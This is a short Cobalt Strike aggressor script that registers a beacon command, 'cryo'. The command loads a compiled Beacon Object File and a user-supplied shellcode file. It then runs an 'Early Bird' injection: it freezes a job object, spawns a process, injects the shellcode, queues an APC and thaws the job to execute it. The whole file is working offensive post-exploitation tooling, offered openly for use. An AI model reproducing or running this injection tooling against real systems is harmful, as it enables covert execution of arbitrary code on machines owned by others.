beacon_command_register(
    "cryo", 
    "Early Bird Cryo Injection Technique - Creates a job object in a frozen state, spawns a process in a EXTENDED_STATUPINFO_PRESENT state, inject shellcode, queues an APC thread, unfreezes job object, and executes shellcode", 
    "Usage: cryo C:\\path\\to\\exe\\to\\hollow.exe /local/path/to/shellcode.bin"
);

alias cryo {
    if(size(@_) != 3)
    {
        berror($1, "Incorrect usage!");
        berror($1, beacon_command_detail("cryo"));
        return;
    }
    local('$handle $data $args');
    $handle = openf(script_resource("cryo.x64.o"));
    $data = readb($handle, -1);
    closef($handle);

    $sc_handle = openf($3);
	  $sc_data = readb($sc_handle, -1);
  	closef($sc_handle);

    $args = bof_pack($1,"zb",$2,$sc_data);
    btask($1, "CRYO - Early Bird Cryo Shellcode Injection");
    btask($1, "Reading shellcode from: $+  $3");

    beacon_inline_execute($1, $data, "go", $args);
}
